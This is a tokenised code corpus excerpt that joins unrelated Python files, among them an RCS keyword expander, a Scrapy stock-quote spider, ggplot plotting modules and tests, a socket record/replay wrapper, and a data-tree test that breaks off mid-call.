<NUM_LIT:1> << <NUM_LIT:9> ) <EOL> RCS_KW_LOCKER = ( <NUM_LIT:1> << <NUM_LIT:10> ) <EOL> RCS_KW_ID = ( RCS_KW_RCSFILE | RCS_KW_REVISION | RCS_KW_DATE | <EOL> RCS_KW_AUTHOR | RCS_KW_STATE ) <EOL> RCS_KW_HEADER = ( RCS_KW_ID | RCS_KW_FULLPATH ) <EOL> rcs_expkw = { <EOL> "<STR_LIT>" : RCS_KW_AUTHOR , <EOL> "<STR_LIT>" : RCS_KW_DATE , <EOL> "<STR_LIT>" : RCS_KW_HEADER , <EOL> "<STR_LIT>" : RCS_KW_ID , <EOL> "<STR_LIT>" : RCS_KW_LOG , <EOL> "<STR_LIT:Name>" : RCS_KW_NAME , <EOL> "<STR_LIT>" : RCS_KW_RCSFILE , <EOL> "<STR_LIT>" : RCS_KW_REVISION , <EOL> "<STR_LIT>" : RCS_KW_SOURCE , <EOL> "<STR_LIT>" : RCS_KW_STATE , <EOL> "<STR_LIT>" : RCS_KW_MDOCDATE , <EOL> "<STR_LIT>" : RCS_KW_LOCKER <EOL> } <EOL> RCS_KWEXP_NONE = ( <NUM_LIT:1> << <NUM_LIT:0> ) <EOL> RCS_KWEXP_NAME = ( <NUM_LIT:1> << <NUM_LIT:1> ) <EOL> RCS_KWEXP_VAL = ( <NUM_LIT:1> << <NUM_LIT:2> ) <EOL> RCS_KWEXP_LKR = ( <NUM_LIT:1> << <NUM_LIT:3> ) <EOL> RCS_KWEXP_OLD = ( <NUM_LIT:1> << <NUM_LIT:4> ) <EOL> RCS_KWEXP_ERR = ( 
<NUM_LIT:1> << <NUM_LIT:5> ) <EOL> RCS_KWEXP_DEFAULT = ( RCS_KWEXP_NAME | RCS_KWEXP_VAL ) <EOL> RCS_KWEXP_KVL = ( RCS_KWEXP_NAME | RCS_KWEXP_VAL | RCS_KWEXP_LKR ) <EOL> def __init__ ( self ) : <EOL> self . rerecomple ( ) <EOL> def rerecomple ( self ) : <EOL> pat = '<STR_LIT:|>' . join ( self . rcs_expkw . keys ( ) ) <EOL> self . re_kw = re . compile ( r"<STR_LIT>" + pat + "<STR_LIT>" ) <EOL> def add_id_keyword ( self , keyword ) : <EOL> self . rcs_expkw [ keyword ] = self . RCS_KW_ID <EOL> self . rerecomple ( ) <EOL> def kflag_get ( self , flags ) : <EOL> if flags is None : <EOL> return self . RCS_KWEXP_DEFAULT <EOL> fl = <NUM_LIT:0> <EOL> for fc in flags : <EOL> if fc == '<STR_LIT:k>' : <EOL> fl |= self . RCS_KWEXP_NAME <EOL> elif fc == '<STR_LIT:v>' : <EOL> fl |= self . RCS_KWEXP_VAL <EOL> elif fc == '<STR_LIT:l>' : <EOL> fl |= self . RCS_KWEXP_LKR <EOL> elif fc == '<STR_LIT:o>' : <EOL> if len ( flags ) != <NUM_LIT:1> : <EOL> fl |= self . RCS_KWEXP_ERR <EOL> fl |= self . RCS_KWEXP_OLD <EOL> elif fc == '<STR_LIT:b>' : <EOL> if len ( flags ) != <NUM_LIT:1> : <EOL> fl |= self . RCS_KWEXP_ERR <EOL> fl |= self . RCS_KWEXP_NONE <EOL> else : <EOL> fl |= self . RCS_KWEXP_ERR <EOL> return fl <EOL> def expand_keyword ( self , filename , r ) : <EOL> rcs = rcsparse . rcsfile ( filename ) <EOL> rev = rcs . revs [ r ] <EOL> mode = self . kflag_get ( rcs . expand ) <EOL> if ( mode & ( self . RCS_KWEXP_NONE | self . RCS_KWEXP_OLD ) ) != <NUM_LIT:0> : <EOL> return rcs . checkout ( rev [ <NUM_LIT:0> ] ) <EOL> s = logbuf = '<STR_LIT>' <EOL> for line in rcs . checkout ( rev [ <NUM_LIT:0> ] ) . split ( '<STR_LIT:\n>' ) : <EOL> while True : <EOL> m = self . re_kw . match ( line ) <EOL> if m is None : <EOL> break <EOL> if len ( line ) > m . end ( <NUM_LIT:1> ) and line [ m . end ( <NUM_LIT:1> ) ] == '<STR_LIT:$>' : <EOL> dsign = m . end ( <NUM_LIT:1> ) <EOL> else : <EOL> try : <EOL> dsign = string . index ( line , '<STR_LIT:$>' , m . 
end ( <NUM_LIT:1> ) ) <EOL> if dsign < <NUM_LIT:0> : <EOL> break <EOL> except : <EOL> break <EOL> prefix = line [ : m . start ( <NUM_LIT:1> ) - <NUM_LIT:1> ] <EOL> line = line [ dsign + <NUM_LIT:1> : ] <EOL> s += prefix <EOL> expbuf = '<STR_LIT>' <EOL> if ( mode & self . RCS_KWEXP_NAME ) != <NUM_LIT:0> : <EOL> expbuf += '<STR_LIT:$>' <EOL> expbuf += m . group ( <NUM_LIT:1> ) <EOL> if ( mode & self . RCS_KWEXP_VAL ) != <NUM_LIT:0> : <EOL> expbuf += '<STR_LIT>' <EOL> if ( mode & self . RCS_KWEXP_VAL ) != <NUM_LIT:0> : <EOL> expkw = self . rcs_expkw [ m . group ( <NUM_LIT:1> ) ] <EOL> if ( expkw & self . RCS_KW_RCSFILE ) != <NUM_LIT:0> : <EOL> expbuf += filename if ( expkw & self . RCS_KW_FULLPATH ) != <NUM_LIT:0> else os . path . basename ( filename ) <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_REVISION ) != <NUM_LIT:0> : <EOL> expbuf += rev [ <NUM_LIT:0> ] <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_DATE ) != <NUM_LIT:0> : <EOL> expbuf += time . strftime ( "<STR_LIT>" , time . gmtime ( rev [ <NUM_LIT:1> ] ) ) <EOL> if ( expkw & self . RCS_KW_MDOCDATE ) != <NUM_LIT:0> : <EOL> d = time . gmtime ( rev [ <NUM_LIT:1> ] ) <EOL> expbuf += time . strftime ( "<STR_LIT>" if ( d . tm_mday < <NUM_LIT:10> ) else "<STR_LIT>" , d ) <EOL> if ( expkw & self . RCS_KW_AUTHOR ) != <NUM_LIT:0> : <EOL> expbuf += rev [ <NUM_LIT:2> ] <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_STATE ) != <NUM_LIT:0> : <EOL> expbuf += rev [ <NUM_LIT:3> ] <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & self . RCS_KW_LOG ) != <NUM_LIT:0> : <EOL> p = prefix <EOL> expbuf += filename if ( expkw & self . RCS_KW_FULLPATH ) != <NUM_LIT:0> else os . path . basename ( filename ) <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> logbuf += '<STR_LIT>' % ( p , rev [ <NUM_LIT:0> ] ) <EOL> logbuf += time . strftime ( "<STR_LIT>" , time . gmtime ( rev [ <NUM_LIT:1> ] ) ) <EOL> logbuf += rev [ <NUM_LIT:2> ] + '<STR_LIT:\n>' <EOL> for lline in rcs . 
getlog ( rev [ <NUM_LIT:0> ] ) . rstrip ( ) . split ( '<STR_LIT:\n>' ) : <EOL> if lline == '<STR_LIT>' : <EOL> logbuf += p . rstrip ( ) + '<STR_LIT:\n>' <EOL> else : <EOL> logbuf += p + lline . lstrip ( ) + '<STR_LIT:\n>' <EOL> if line == '<STR_LIT>' : <EOL> logbuf += p . rstrip ( ) + '<STR_LIT:\n>' <EOL> else : <EOL> logbuf += p + line . lstrip ( ) + '<STR_LIT:\n>' <EOL> line = '<STR_LIT>' <EOL> if ( expkw & self . RCS_KW_SOURCE ) != <NUM_LIT:0> : <EOL> expbuf += filename <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( expkw & ( self . RCS_KW_NAME | self . RCS_KW_LOCKER ) ) != <NUM_LIT:0> : <EOL> expbuf += "<STR_LIT:U+0020>" <EOL> if ( mode & self . RCS_KWEXP_NAME ) != <NUM_LIT:0> : <EOL> expbuf += '<STR_LIT:$>' <EOL> s += expbuf [ : <NUM_LIT:255> ] <EOL> s += line + '<STR_LIT:\n>' <EOL> if len ( logbuf ) > <NUM_LIT:0> : <EOL> s += logbuf <EOL> logbuf = '<STR_LIT>' <EOL> return s [ : - <NUM_LIT:1> ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> def got_reply ( srcip , srcport , mess , ch ) : <EOL> print "<STR_LIT>" + mess + "<STR_LIT>" + srcip + "<STR_LIT::>" + str ( srcport ) <EOL> if callfunc == '<STR_LIT>' : <EOL> if len ( callargs ) != <NUM_LIT:2> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> recvmess ( getmyip ( ) , int ( callargs [ <NUM_LIT:1> ] ) , got_reply ) <EOL> sendmess ( callargs [ <NUM_LIT:0> ] , int ( callargs [ <NUM_LIT:1> ] ) , "<STR_LIT>" + getmyip ( ) + "<STR_LIT::>" + str ( callargs [ <NUM_LIT:1> ] ) , getmyip ( ) , int ( callargs [ <NUM_LIT:1> ] ) ) <EOL> settimer ( <NUM_LIT:5> , exitall , ( ) ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import scrapy , json <EOL> from dateutil import parser <EOL> from scrapy import log <EOL> from scrapy . selector import Selector <EOL> import utils <EOL> from stockspider . items import * <EOL> class HqSpider ( scrapy . Spider ) : <EOL> name = "<STR_LIT>" <EOL> allowed_domains = [ "<STR_LIT>" ] <EOL> access_token = None <EOL> def start_requests ( self ) : <EOL> request_hq_access_token = scrapy . Request ( "<STR_LIT>" , callback = self . parse_hq ) <EOL> return [ request_hq_access_token ] <EOL> def parse_hq ( self , response ) : <EOL> access_token_list = response . xpath ( '<STR_LIT>' ) . re ( '<STR_LIT>' ) <EOL> assert len ( access_token_list ) == <NUM_LIT:1> <EOL> self . access_token = access_token_list [ <NUM_LIT:0> ] <EOL> request = scrapy . Request ( "<STR_LIT>" , <EOL> cookies = self . get_cookies ( ) , <EOL> headers = self . get_ajax_header ( ) , <EOL> callback = self . parse_hq_count ) <EOL> return request <EOL> def parse_hq_count ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> count = int ( json_response [ '<STR_LIT:count>' ] [ '<STR_LIT:count>' ] ) <EOL> page_size = <NUM_LIT:100> <EOL> for page in xrange ( <NUM_LIT:0> , count / page_size + <NUM_LIT:1> ) : <EOL> request = scrapy . Request ( "<STR_LIT>" % ( page + <NUM_LIT:1> , page_size ) , <EOL> cookies = self . get_cookies ( ) , <EOL> headers = self . get_ajax_header ( ) , <EOL> callback = self . parse_hq_stock_name_list ) <EOL> yield request <EOL> def parse_hq_stock_name_list ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> if '<STR_LIT:success>' not in json_response or json_response [ '<STR_LIT:success>' ] != '<STR_LIT:true>' : <EOL> log . 
msg ( '<STR_LIT>' ) <EOL> return <EOL> for stock in json_response [ '<STR_LIT>' ] : <EOL> item = StockItem ( ) <EOL> item [ '<STR_LIT>' ] = stock [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT:name>' ] = stock [ '<STR_LIT:name>' ] <EOL> item [ '<STR_LIT>' ] = getmarket ( stock [ '<STR_LIT>' ] ) <EOL> item [ '<STR_LIT>' ] = getcatelog ( stock [ '<STR_LIT>' ] ) <EOL> yield item <EOL> request = scrapy . Request ( "<STR_LIT>" % ( stock [ '<STR_LIT>' ] ) , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock_category ) <EOL> yield request <EOL> if item [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> continue <EOL> request = scrapy . Request ( "<STR_LIT>" % ( stock [ '<STR_LIT>' ] ) , <EOL> meta = { '<STR_LIT>' : stock [ '<STR_LIT>' ] } , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock_basic ) <EOL> yield request <EOL> request = scrapy . Request ( "<STR_LIT>" % stock [ '<STR_LIT>' ] , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock ) <EOL> import datetime <EOL> from dateutil . relativedelta import relativedelta <EOL> now = datetime . datetime . now ( ) <EOL> years_ago = datetime . datetime . now ( ) - relativedelta ( years = <NUM_LIT:1> ) <EOL> datetime_to_timestamp = lambda dt : int ( ( dt - datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) * <NUM_LIT:1000> ) <EOL> begin = datetime_to_timestamp ( years_ago ) <EOL> end = datetime_to_timestamp ( now ) <EOL> request = scrapy . Request ( "<STR_LIT>" % ( stock [ '<STR_LIT>' ] , begin , end ) , <EOL> cookies = self . get_cookies ( ) , <EOL> callback = self . parse_hq_stock_k_1d ) <EOL> yield request <EOL> def parse_hq_stock_category ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> if '<STR_LIT>' not in json_response : <EOL> log . 
msg ( '<STR_LIT>' ) <EOL> item = StockItem ( ) <EOL> item [ '<STR_LIT>' ] = json_response [ '<STR_LIT:code>' ] <EOL> item [ '<STR_LIT>' ] = json_response [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> yield item <EOL> def parse_hq_stock_basic ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> item = StockItem ( ) <EOL> symbol = response . meta [ '<STR_LIT>' ] <EOL> value = json_response [ symbol ] <EOL> item [ '<STR_LIT>' ] = symbol <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> item [ '<STR_LIT>' ] = float ( value . get ( '<STR_LIT>' , <NUM_LIT:0> ) or <NUM_LIT:0> ) or None <EOL> yield item <EOL> def parse_hq_stock ( self , response ) : <EOL> for td in response . xpath ( '<STR_LIT>' ) . extract ( ) : <EOL> td_selector = Selector ( text = td ) <EOL> name_list = td_selector . xpath ( '<STR_LIT>' ) . extract ( ) <EOL> value_list = td_selector . xpath ( '<STR_LIT>' ) . extract ( ) <EOL> if len ( name_list ) and len ( value_list ) : <EOL> name = name_list [ <NUM_LIT:0> ] <EOL> value = value_list [ <NUM_LIT:0> ] <EOL> log . 
msg ( name + '<STR_LIT:_>' + value ) <EOL> def parse_hq_stock_k_1d ( self , response ) : <EOL> json_response = json . loads ( response . body_as_unicode ( ) ) <EOL> if '<STR_LIT:success>' not in json_response or json_response [ '<STR_LIT:success>' ] != '<STR_LIT:true>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> return <EOL> symbol = json_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if json_response [ '<STR_LIT>' ] : <EOL> for chart in json_response [ '<STR_LIT>' ] : <EOL> item = StockKLineDayItem ( ) <EOL> item [ '<STR_LIT>' ] = symbol <EOL> item [ '<STR_LIT>' ] = parser . parse ( chart [ '<STR_LIT:time>' ] ) . replace ( tzinfo = None ) <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart [ '<STR_LIT>' ] <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , None ) <EOL> item [ '<STR_LIT>' ] = chart . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> yield item <EOL> def get_ajax_header ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def get_cookies ( self ) : <EOL> return { '<STR_LIT>' : self . access_token } </s>
<s> from django . conf . urls import patterns , include , url <EOL> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = staticfiles_urlpatterns ( ) + patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' , namespace = '<STR_LIT>' ) ) , <EOL> ) </s>
<s> from ggplot import * <EOL> print ( ggplot ( diamonds , aes ( x = '<STR_LIT>' ) ) + geom_histogram ( ) ) <EOL> plt . show ( <NUM_LIT:1> ) </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> from . geom import geom <EOL> class geom_area ( geom ) : <EOL> DEFAULT_AES = { '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:size>' : <NUM_LIT:1.0> } <EOL> REQUIRED_AES = { '<STR_LIT:x>' , '<STR_LIT>' , '<STR_LIT>' } <EOL> DEFAULT_PARAMS = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> _aes_renames = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> _units = { '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } <EOL> def _plot_unit ( self , pinfo , ax ) : <EOL> pinfo = self . sort_by_x ( pinfo ) <EOL> ax . fill_between ( ** pinfo ) </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> from . scale import scale <EOL> from copy import deepcopy <EOL> class scale_colour_manual ( scale ) : <EOL> """<STR_LIT>""" <EOL> VALID_SCALES = [ '<STR_LIT>' ] <EOL> def __radd__ ( self , gg ) : <EOL> gg = deepcopy ( gg ) <EOL> if not ( self . values is None ) : <EOL> n_colors_needed = gg . data [ gg . aesthetics [ '<STR_LIT>' ] ] . nunique ( ) <EOL> n_colors_provided = len ( self . values ) <EOL> if n_colors_provided < n_colors_needed : <EOL> msg = '<STR_LIT>' <EOL> raise Exception ( msg . format ( n_colors_needed , n_colors_provided ) ) <EOL> gg . manual_color_list = self . values [ : n_colors_needed ] <EOL> return gg </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> from . import get_assert_same_ggplot , cleanup <EOL> assert_same_ggplot = get_assert_same_ggplot ( __file__ ) <EOL> from ggplot import * <EOL> import numpy as np <EOL> import pandas as pd <EOL> def _build_testing_df ( ) : <EOL> df = pd . DataFrame ( { <EOL> "<STR_LIT:x>" : np . arange ( <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> "<STR_LIT:y>" : np . arange ( <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> "<STR_LIT:z>" : np . arange ( <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> "<STR_LIT:a>" : [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> } ) <EOL> df [ '<STR_LIT>' ] = np . where ( df . x > <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' ) <EOL> df [ '<STR_LIT>' ] = np . where ( ( df . x % <NUM_LIT:2> ) == <NUM_LIT:0> , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return df <EOL> def _build_small_df ( ) : <EOL> return pd . DataFrame ( { <EOL> "<STR_LIT:x>" : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> "<STR_LIT:y>" : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> "<STR_LIT:a>" : [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> "<STR_LIT:b>" : [ "<STR_LIT:c>" , "<STR_LIT:c>" , "<STR_LIT:d>" , "<STR_LIT:d>" ] <EOL> } ) <EOL> @ cleanup <EOL> def test_facet_grid_continous ( ) : <EOL> df = _build_testing_df ( ) <EOL> p = ggplot ( aes ( x = '<STR_LIT:x>' , y = '<STR_LIT:y>' , colour = '<STR_LIT:z>' ) , data = df ) <EOL> p = p + geom_point ( ) + scale_colour_gradient ( low = "<STR_LIT>" , high = "<STR_LIT>" ) <EOL> p = p + facet_grid ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert_same_ggplot ( p , "<STR_LIT>" ) <EOL> @ cleanup <EOL> def test_facet_wrap_continous ( ) : <EOL> df = _build_testing_df ( ) <EOL> p = ggplot ( aes ( x = '<STR_LIT:x>' , y = '<STR_LIT:y>' , colour = '<STR_LIT:z>' ) , data = df ) <EOL> p = p + geom_point ( ) + 
scale_colour_gradient ( low = "<STR_LIT>" , high = "<STR_LIT>" ) <EOL> p = p + facet_wrap ( "<STR_LIT>" ) <EOL> assert_same_ggplot ( p , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from copy import deepcopy <EOL> from . element_target import element_target_factory , merge_element_targets <EOL> class theme ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , complete = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . element_themes = [ ] <EOL> self . complete = complete <EOL> self . _rcParams = { } <EOL> for target_name , theme_element in kwargs . items ( ) : <EOL> self . element_themes . append ( element_target_factory ( target_name , <EOL> theme_element ) ) <EOL> def apply_theme ( self , ax ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_rcParams ( self ) : <EOL> """<STR_LIT>""" <EOL> rcParams = deepcopy ( self . _rcParams ) <EOL> if self . element_themes : <EOL> for element_theme in self . element_themes : <EOL> rcparams = element_theme . get_rcParams ( ) <EOL> rcParams . update ( rcparams ) <EOL> return rcParams <EOL> def post_plot_callback ( self , ax ) : <EOL> """<STR_LIT>""" <EOL> self . apply_theme ( ax ) <EOL> for element_theme in self . element_themes : <EOL> element_theme . post_plot_callback ( ax ) <EOL> def add_theme ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . complete : <EOL> return other <EOL> else : <EOL> theme_copy = deepcopy ( self ) <EOL> theme_copy . element_themes = merge_element_targets ( <EOL> deepcopy ( self . element_themes ) , <EOL> deepcopy ( other . element_themes ) ) <EOL> return theme_copy <EOL> def __add__ ( self , other ) : <EOL> if isinstance ( other , theme ) : <EOL> return self . add_theme ( other ) <EOL> else : <EOL> raise TypeError ( ) <EOL> def __radd__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , theme ) : <EOL> gg_copy = deepcopy ( other ) <EOL> if self . complete : <EOL> gg_copy . theme = self <EOL> else : <EOL> gg_copy . theme = other . theme . add_theme ( self ) <EOL> return gg_copy <EOL> else : <EOL> if self . complete : <EOL> return self <EOL> else : <EOL> theme_copy = deepcopy ( other ) <EOL> theme_copy . 
element_themes . append ( self ) <EOL> return theme_copy </s>
<s> from socket import socket as _socket <EOL> class socket ( object ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _ss = _socket ( * args , ** kwargs ) <EOL> self . records = [ ] <EOL> self . recording = False <EOL> self . replaying = False <EOL> def start_record ( self ) : <EOL> self . recording = True <EOL> self . replaying = False <EOL> self . records = [ ] <EOL> def start_replay ( self ) : <EOL> self . recording = False <EOL> self . replaying = True <EOL> self . replay_records = self . records [ : ] <EOL> def settimeout ( self , n ) : <EOL> return self . _ss . settimeout ( n ) <EOL> def connect ( self , * args , ** kwargs ) : <EOL> return self . _ss . connect ( * args , ** kwargs ) <EOL> def setsockopt ( self , * args ) : <EOL> if not self . replaying : <EOL> return self . _ss . setsockopt ( * args ) <EOL> def shutdown ( self , * args ) : <EOL> if not self . replaying : <EOL> return self . _ss . shutdown ( * args ) <EOL> def send ( self , buf ) : <EOL> if self . replaying : <EOL> return len ( buf ) <EOL> else : <EOL> return self . _ss . send ( buf ) <EOL> def sendall ( self , buf ) : <EOL> if self . replaying : <EOL> return len ( buf ) <EOL> else : <EOL> return self . _ss . sendall ( buf ) <EOL> def recv ( self , size ) : <EOL> if self . replaying : <EOL> return self . replay_records . pop ( ) <EOL> buf = self . _ss . recv ( size ) <EOL> if self . recording : <EOL> self . records . append ( buf ) <EOL> return buf <EOL> def recv_into ( self , buf ) : <EOL> if self . replaying : <EOL> s = self . replay_records . pop ( ) <EOL> buf [ : len ( s ) ] = s <EOL> return len ( s ) <EOL> ret = self . _ss . recv_into ( buf ) <EOL> if self . recording : <EOL> self . records . append ( buf [ : ret ] ) <EOL> return ret <EOL> def close ( self ) : <EOL> return self . _ss . close ( ) <EOL> import socket as socketmodule <EOL> socketmodule . socket = socket <EOL> def run_with_recording ( sock , func ) : <EOL> sock . 
start_record ( ) <EOL> func ( ) <EOL> def run_with_replay ( sock , func ) : <EOL> sock . start_replay ( ) <EOL> func ( ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> class Bidict ( dict ) : <EOL> def __init__ ( self , iterable = ( ) , ** kwargs ) : <EOL> self . update ( iterable , ** kwargs ) <EOL> def update ( self , iterable = ( ) , ** kwargs ) : <EOL> if hasattr ( iterable , '<STR_LIT>' ) : <EOL> iterable = iterable . iteritems ( ) <EOL> for ( key , value ) in itertools . chain ( iterable , kwargs . iteritems ( ) ) : <EOL> self [ key ] = value <EOL> def __setitem__ ( self , key , value ) : <EOL> if key in self : <EOL> del self [ key ] <EOL> if value in self : <EOL> del self [ value ] <EOL> dict . __setitem__ ( self , key , value ) <EOL> dict . __setitem__ ( self , value , key ) <EOL> def __delitem__ ( self , key ) : <EOL> value = self [ key ] <EOL> dict . __delitem__ ( self , key ) <EOL> dict . __delitem__ ( self , value ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , dict . __repr__ ( self ) ) </s>
<s> import datetime <EOL> import json <EOL> import numpy as np <EOL> from json import encoder <EOL> encoder . FLOAT_REPR = lambda f : format ( f , '<STR_LIT>' ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class print2f ( float ) : <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self <EOL> def json_encode ( value ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( value ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def json_decode ( value ) : <EOL> """<STR_LIT>""" <EOL> return json . loads ( value ) </s>
<s> import pytest <EOL> from chillaxd import datatree <EOL> class TestDataTree ( object ) : <EOL> def setup_method ( self , method ) : <EOL> self . test_dt = datatree . DataTree ( ) <EOL> def test_create_node ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:a>" ] == self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:a>" ] == self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:b>" ] == self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children = self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children . sort ( ) <EOL> assert [ "<STR_LIT:b>" , "<STR_LIT:c>" ] == children <EOL> assert "<STR_LIT>" == self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_create_node_with_no_parent ( self ) : <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . create_node , <EOL> 